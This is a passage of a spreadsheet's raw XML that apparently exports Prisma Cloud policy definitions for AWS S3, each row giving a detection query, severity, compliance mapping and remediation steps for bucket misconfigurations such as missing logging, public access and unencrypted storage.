          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = "(publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.blockPublicAcls is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.blockPublicAcls is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.ignorePublicAcls is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.ignorePublicAcls is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.blockPublicPolicy is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.blockPublicPolicy is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.restrictPublicBuckets is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false))"</t>
        </is>
      </c>
      <c r="AA86" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB86" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC86" t="inlineStr"/>
      <c r="AD86" t="b">
        <v>0</v>
      </c>
      <c r="AE86" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF86" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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6" t="inlineStr">
        <is>
          <t>9d4c15dc-06ae-491c-99b0-e8a3e3d225ec</t>
        </is>
      </c>
      <c r="AI86" t="inlineStr">
        <is>
          <t>b22df320-13e7-4108-8142-d1bd858b8d46</t>
        </is>
      </c>
      <c r="AJ86" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK86" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B87" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C87" s="2" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="D87" t="inlineStr"/>
      <c r="E87" t="inlineStr"/>
      <c r="F87" t="inlineStr"/>
      <c r="G87" t="b">
        <v>1</v>
      </c>
      <c r="H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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J87" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K87" t="inlineStr">
        <is>
          <t>AWS Access logging not enabled on S3 buckets</t>
        </is>
      </c>
      <c r="L87" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M87" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N87" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O87" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P87" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q87" t="inlineStr">
        <is>
          <t>Identify</t>
        </is>
      </c>
      <c r="R87" t="inlineStr">
        <is>
          <t>Logging</t>
        </is>
      </c>
      <c r="S87" t="inlineStr">
        <is>
          <t>Attack Path Rule,PCI DSS v3.2,Awesome_Standard,AW_AWS_Logging</t>
        </is>
      </c>
      <c r="T87" t="b">
        <v>0</v>
      </c>
      <c r="U87" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V87" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W87" t="inlineStr">
        <is>
          <t>Checks for S3 buckets without access logging turned on. Access logging allows customers to view complete audit trail on sensitive workloads such as S3 buckets. It is recommended that Access logging is turned on for all S3 buckets to meet audit &amp; compliance requirement</t>
        </is>
      </c>
      <c r="X87" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console and navigate to the 'S3' service.
2. Click on the the S3 bucket that was reported.
3. Click on the 'Properties' tab.
4. Under the 'Server access logging' section, select 'Enable logging' option. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-13-enable-logging
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-13-enable-logging</t>
        </is>
      </c>
      <c r="Y87" t="inlineStr"/>
      <c r="Z87" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule='loggingConfiguration.targetBucket equals null or loggingConfiguration.targetPrefix equals null'
{"category":"Storage","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA87" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB87" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC87" t="inlineStr">
        <is>
          <t>PC-AWS-S3-30-CKV_AWS_18</t>
        </is>
      </c>
      <c r="AD87" t="b">
        <v>1</v>
      </c>
      <c r="AE87" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF87" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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7" t="inlineStr">
        <is>
          <t>4daa435b-fa46-457a-9359-6a4b4a43a442</t>
        </is>
      </c>
      <c r="AI87" t="inlineStr">
        <is>
          <t>4daa435b-fa46-457a-9359-6a4b4a43a442</t>
        </is>
      </c>
      <c r="AJ87" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK87" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B88" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C88" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D88" t="n">
        <v>0</v>
      </c>
      <c r="E88" t="n">
        <v>7</v>
      </c>
      <c r="F88" t="n">
        <v>0</v>
      </c>
      <c r="G88" t="b">
        <v>1</v>
      </c>
      <c r="H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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J88" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K88" t="inlineStr">
        <is>
          <t>AWS S3 bucket not configured with secure data transport policy</t>
        </is>
      </c>
      <c r="L88" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M88" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N88" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O88" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P88" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q88" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R88" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S88" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T88" t="b">
        <v>0</v>
      </c>
      <c r="U88" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V88" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W88" t="inlineStr">
        <is>
          <t>This policy identifies S3 buckets which are not configured with secure data transport policy. AWS S3 buckets should enforce encryption of data over the network using Secure Sockets Layer (SSL). It is recommended to add a bucket policy that explicitly denies (Effect: Deny) all access (Action: s3:*) from anybody who browses (Principal: *) to Amazon S3 objects within an Amazon S3 bucket if they are not accessed through HTTPS (aws:SecureTransport: false).</t>
        </is>
      </c>
      <c r="X88" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. Navigate to Amazon S3 Dashboard
3. Click on 'Buckets' (Left Panel)
4. Choose the reported S3 bucket
5. On 'Permissions' tab, Click on 'Bucket Policy'
6. Add a bucket policy that explicitly denies (Effect: Deny) all access (Action: s3:) from anybody who browses (Principal: ) to Amazon S3 objects within an Amazon S3 bucket if they are not accessed through HTTPS (aws:SecureTransport: false). Below is the sample policy:
{
 "Sid": "ForceSSLOnlyAccess",
 "Effect": "Deny",
 "Principal": "*",
 "Action": "s3:GetObject",
 "Resource": "arn:aws:s3:::bucket_name/*",
 "Condition": {
   "Bool": {
   "aws:SecureTransport": "false"
  }
 }
}</t>
        </is>
      </c>
      <c r="Y88" t="inlineStr"/>
      <c r="Z88" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = "(((((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) or policyStatus.isPublic is true) and publicAccessBlockConfiguration does not exist) or ((acl.grants[?(@.grantee=='AllUsers')] size &gt; 0) and publicAccessBlockConfiguration.ignorePublicAcls is false) or (policyStatus.isPublic is true and publicAccessBlockConfiguration.restrictPublicBuckets is false)) and websiteConfiguration does not exist) and ((policy.Statement[*].Condition.Bool.aws:SecureTransport does not exist) or ((policy.Statement[?(@.Principal=='*' || @.Principal.AWS=='*')].Action contains s3: or policy.Statement[?(@.Principal=='*' || @.Principal.AWS=='*')].Action[*] contains s3:) and (policy.Statement[?(@.Principal=='*' &amp;&amp; @.Effect=='Allow')].Condition.Bool.aws:SecureTransport contains false or policy.Statement[?(@.Principal.AWS=='*' &amp;&amp; @.Effect=='Allow')].Condition.Bool.aws:SecureTransport contains false or policy.Statement[?(@.Principal=='*' &amp;&amp; @.Effect=='Allow')].Condition.Bool.aws:SecureTransport contains FALSE or policy.Statement[?(@.Principal.AWS=='*' &amp;&amp; @.Effect=='Allow')].Condition.Bool.aws:SecureTransport contains FALSE or policy.Statement[?(@.Principal=='*' &amp;&amp; @.Effect=='Deny')].Condition.Bool.aws:SecureTransport contains true or policy.Statement[?(@.Principal.AWS=='*' &amp;&amp; @.Effect=='Deny')].Condition.Bool.aws:SecureTransport contains true or policy.Statement[?(@.Principal=='*' &amp;&amp; @.Effect=='Deny')].Condition.Bool.aws:SecureTransport contains TRUE or policy.Statement[?(@.Principal.AWS=='*' &amp;&amp; @.Effect=='Deny')].Condition.Bool.aws:SecureTransport contains TRUE)))"</t>
        </is>
      </c>
      <c r="AA88" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB88" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC88" t="inlineStr">
        <is>
          <t>PC-AWS-S3-322</t>
        </is>
      </c>
      <c r="AD88" t="b">
        <v>1</v>
      </c>
      <c r="AE88" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF88" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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8" t="inlineStr">
        <is>
          <t>7b0df373-006a-40d6-9f3d-68e6ea0bdd5d</t>
        </is>
      </c>
      <c r="AI88" t="inlineStr">
        <is>
          <t>dd9a332e-673b-44c6-8bd2-e801fdea4a12</t>
        </is>
      </c>
      <c r="AJ88" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK88" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B89" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C89" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D89" t="n">
        <v>0</v>
      </c>
      <c r="E89" t="n">
        <v>0</v>
      </c>
      <c r="F89" t="n">
        <v>42</v>
      </c>
      <c r="G89" t="b">
        <v>1</v>
      </c>
      <c r="H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89" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J89" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K89" t="inlineStr">
        <is>
          <t>AWS S3 Buckets Block public access setting disabled</t>
        </is>
      </c>
      <c r="L89" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M89" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N89" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O89" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P89" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q89" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R89" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S89" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T89" t="b">
        <v>1</v>
      </c>
      <c r="U89" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V89" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W89" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 buckets which have 'Block public access' setting disabled. Amazon S3 provides 'Block public access' setting to manage public access of AWS S3 buckets. Enabling 'Block public access' setting prevents S3 resource data being accidentally or maliciously becoming publicly accessible. It is highly recommended to enable 'Block public access' setting for all AWS s3 buckets appropriately.</t>
        </is>
      </c>
      <c r="X89" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions'
5. Under 'Block public access' click on 'Edit'
6. Select 'Block all public access' checkbox
7. Click on Save
8. 'Confirm' the changes
Note: Make sure updating 'Block public access' setting does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y89" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 's3:PutBucketPublicAccessBlock' permission. Successful execution enables 'Block public access' setting.\nNote: Make sure updating 'Block public access' setting does not affect S3 bucket data access.",
'impact': "Enables 'Block public access' setting for AWS S3 bucket",
'cliScriptTemplate': 'aws s3api put-public-access-block --bucket $resourceName --public-access-block-configuration "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"'</t>
        </is>
      </c>
      <c r="Z89" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = "(publicAccessBlockConfiguration does not exist and accountLevelPublicAccessBlockConfiguration does not exist) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.blockPublicAcls is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.blockPublicAcls is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.ignorePublicAcls is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.ignorePublicAcls is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.blockPublicPolicy is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.blockPublicPolicy is false)) or ((publicAccessBlockConfiguration does not exist or publicAccessBlockConfiguration.restrictPublicBuckets is false) and (accountLevelPublicAccessBlockConfiguration does not exist or accountLevelPublicAccessBlockConfiguration.restrictPublicBuckets is false))"</t>
        </is>
      </c>
      <c r="AA89" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB89" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC89" t="inlineStr">
        <is>
          <t>PC-AWS-S3-547</t>
        </is>
      </c>
      <c r="AD89" t="b">
        <v>1</v>
      </c>
      <c r="AE89" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF89" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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89" t="inlineStr">
        <is>
          <t>34064d53-1fd1-42e6-b075-45dce495caca</t>
        </is>
      </c>
      <c r="AI89" t="inlineStr">
        <is>
          <t>b22df320-13e7-4108-8142-d1bd858b8d46</t>
        </is>
      </c>
      <c r="AJ89" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK89" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B90" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C90" s="2" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="D90" t="inlineStr"/>
      <c r="E90" t="inlineStr"/>
      <c r="F90" t="inlineStr"/>
      <c r="G90" t="b">
        <v>1</v>
      </c>
      <c r="H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kfirdaus-alert-rule-test,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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J90" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K90" t="inlineStr">
        <is>
          <t>AWS S3 bucket access control lists (ACLs) in use</t>
        </is>
      </c>
      <c r="L90" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M90" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N90" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O90" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P90" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q90" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R90" t="inlineStr">
        <is>
          <t>Secure access management</t>
        </is>
      </c>
      <c r="S90" t="inlineStr">
        <is>
          <t>Awesome_Standard,AW_AWS_Secure access management</t>
        </is>
      </c>
      <c r="T90" t="b">
        <v>1</v>
      </c>
      <c r="U90" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V90" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W90" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 buckets which are using access control lists (ACLs). ACLs are legacy way to control access to S3 buckets. It is recommended to disable bucket ACL and instead use IAM policies or S3 bucket policies to manage access to your S3 buckets.</t>
        </is>
      </c>
      <c r="X90" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Click on the 'Permissions' tab
5. Under 'Object Ownership' click 'Edit'
6. Select 'ACLs disabled (recommended)'
7. Click on 'Save changes' 
Build Recommendation: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-general-policies/bc-aws-general-112
IaC: Refer the documentation for more details,
https://docs.paloaltonetworks.com/content/techdocs/en_US/prisma/prisma-cloud/prisma-cloud-code-security-policy-reference/aws-policies/aws-general-policies/bc-aws-general-112</t>
        </is>
      </c>
      <c r="Y90" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 's3:PutBucketOwnershipControls' permission. Successful execution will update the ACL OwnershipControls to 'BucketOwnerEnforced' for the S3 bucket",
'impact': "Enables 'BucketOwnerEnforced' ACL setting for AWS S3 bucket",
'cliScriptTemplate': 'aws s3api put-bucket-ownership-controls --bucket $resourceName --ownership-controls \'"Rules":["ObjectOwnership":"BucketOwnerEnforced"]\''</t>
        </is>
      </c>
      <c r="Z90" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = ownershipControls.rules[*] does not contain BucketOwnerEnforced
{"category":"General","resourceTypes":["aws_s3_bucket_ownership_controls"]}</t>
        </is>
      </c>
      <c r="AA90" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB90" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC90" t="inlineStr">
        <is>
          <t>PC-AWS-S3-896-CKV2_AWS_65</t>
        </is>
      </c>
      <c r="AD90" t="b">
        <v>1</v>
      </c>
      <c r="AE90" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF90" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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kfirdaus-alert-rule-test - Notifications:email, AccountGroups:PCS AWS Accounts;,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0" t="inlineStr">
        <is>
          <t>cab6f1a5-f6c5-4caf-bf10-b0f3a29e90ea</t>
        </is>
      </c>
      <c r="AI90" t="inlineStr">
        <is>
          <t>b8e3f191-9cfb-4707-8a82-cb5f784f7694</t>
        </is>
      </c>
      <c r="AJ90" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK90" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="91">
      <c r="A91" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B91" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C91" s="2" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="D91" t="inlineStr"/>
      <c r="E91" t="inlineStr"/>
      <c r="F91" t="inlineStr"/>
      <c r="G91" t="b">
        <v>1</v>
      </c>
      <c r="H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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J91" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K91" t="inlineStr">
        <is>
          <t>AWS S3 buckets do not have server side encryption</t>
        </is>
      </c>
      <c r="L91" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M91" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N91" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O91" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P91" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q91" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R91" t="inlineStr">
        <is>
          <t>Data protection</t>
        </is>
      </c>
      <c r="S91" t="inlineStr">
        <is>
          <t>PCI DSS v3.2,Awesome_Standard,AW_AWS_Data protection</t>
        </is>
      </c>
      <c r="T91" t="b">
        <v>0</v>
      </c>
      <c r="U91" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V91" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W91" t="inlineStr">
        <is>
          <t>Customers can protect the data in S3 buckets using the AWS server-side encryption. If the server-side encryption is not turned on for S3 buckets with sensitive data, in the event of a data breach, malicious users can gain access to the data.
NOTE: Do NOT enable this policy if you are using 'Server-Side Encryption with Customer-Provided Encryption Keys (SSE-C).'</t>
        </is>
      </c>
      <c r="X91" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console and navigate to the 'S3' service
2. Click on the reported S3 bucket
3. Click on the 'Properties' tab
4. Under the 'Default encryption' section, choose encryption option either AES-256 or AWS-KMS based on your requirement.
For more information about Server-side encryption,
Default encryption:
https://docs.aws.amazon.com/AmazonS3/latest/dev/bucket-encryption.html
Policy based encryption:
https://docs.aws.amazon.com/AmazonS3/latest/dev/serv-side-encryption.html 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-14-data-encrypted-at-rest
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-14-data-encrypted-at-rest</t>
        </is>
      </c>
      <c r="Y91" t="inlineStr"/>
      <c r="Z91" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-s3api-get-bucket-acl' AND json.rule = 'policyAvailable is true and denyUnencryptedUploadsPolicies[*] is empty and sseAlgorithm equals None'
{"category":"Storage","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA91" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB91" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC91" t="inlineStr">
        <is>
          <t>PC-AWS-S3-64-CKV_AWS_19</t>
        </is>
      </c>
      <c r="AD91" t="b">
        <v>1</v>
      </c>
      <c r="AE91" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF91" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG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1" t="inlineStr">
        <is>
          <t>7913fcbf-b679-5aac-d979-1b6817becb22</t>
        </is>
      </c>
      <c r="AI91" t="inlineStr">
        <is>
          <t>d0658e3d-4d59-4333-b80c-b90e2e28dbaa</t>
        </is>
      </c>
      <c r="AJ91" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK91" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="92">
      <c r="A92" t="inlineStr">
        <is>
          <t>Awesome Standard</t>
        </is>
      </c>
      <c r="B92" s="2" t="inlineStr">
        <is>
          <t>Awesome Inc</t>
        </is>
      </c>
      <c r="C92" s="2" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="D92" t="n">
        <v>0</v>
      </c>
      <c r="E92" t="n">
        <v>2</v>
      </c>
      <c r="F92" t="n">
        <v>0</v>
      </c>
      <c r="G92" t="b">
        <v>1</v>
      </c>
      <c r="H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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J92" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K92" t="inlineStr">
        <is>
          <t>AWS S3 bucket publicly writable</t>
        </is>
      </c>
      <c r="L92" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M92" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N92" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O92" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P92" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q92" t="inlineStr">
        <is>
          <t>Protect</t>
        </is>
      </c>
      <c r="R92" t="inlineStr">
        <is>
          <t>Secure network configuration</t>
        </is>
      </c>
      <c r="S92" t="inlineStr">
        <is>
          <t>Attack Path Rule,Awesome_Standard,AW_AWS_Secure network configuration</t>
        </is>
      </c>
      <c r="T92" t="b">
        <v>0</v>
      </c>
      <c r="U92" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V92" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W92" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets that are publicly writable by Put/Create/Update/Replicate/Write/Delete bucket operations. These permissions permit anyone, malicious or not, to Put/Create/Update/Replicate/Write/Delete bucket operations on your S3 bucket if they can guess the namespace. S3 service does not protect the namespace if ACLs and Bucket policy is not handled properly, with this configuration you may be at risk of compromise of critical data by leaving S3 public.
For more details:
https://docs.aws.amazon.com/AmazonS3/latest/user-guide/set-permissions.html
https://docs.aws.amazon.com/AmazonS3/latest/dev/about-object-ownership.html#ensure-object-ownership</t>
        </is>
      </c>
      <c r="X92" t="inlineStr">
        <is>
          <t>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PUT/CREATE/REPLICATE/DELETE objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific PUT/CREATE/REPLICATE/DELETE functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y92" t="inlineStr"/>
      <c r="Z92" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule =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and (acl.grantsAsList[?any(grantee equals AllUsers and permission is member of (WriteAcp,Write,FullControl))] exists or acl.grantsAsList[?any(grantee equals AuthenticatedUsers and permission is member of (WriteAcp,Write,FullControl))] exists))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and (policy.Statement[?any(Effect equals Allow and (Principal equals * or Principal.AWS equals *) and (Action contains s3:* or Action contains s3:Put or Action contains s3:Create or Action contains s3:Replicate or Action contains s3:Update or Action contains s3:Delete) and (Condition does not exist))] exists))) and websiteConfiguration does not exist</t>
        </is>
      </c>
      <c r="AA92" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB92" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC92" t="inlineStr">
        <is>
          <t>PC-AWS-S3-636</t>
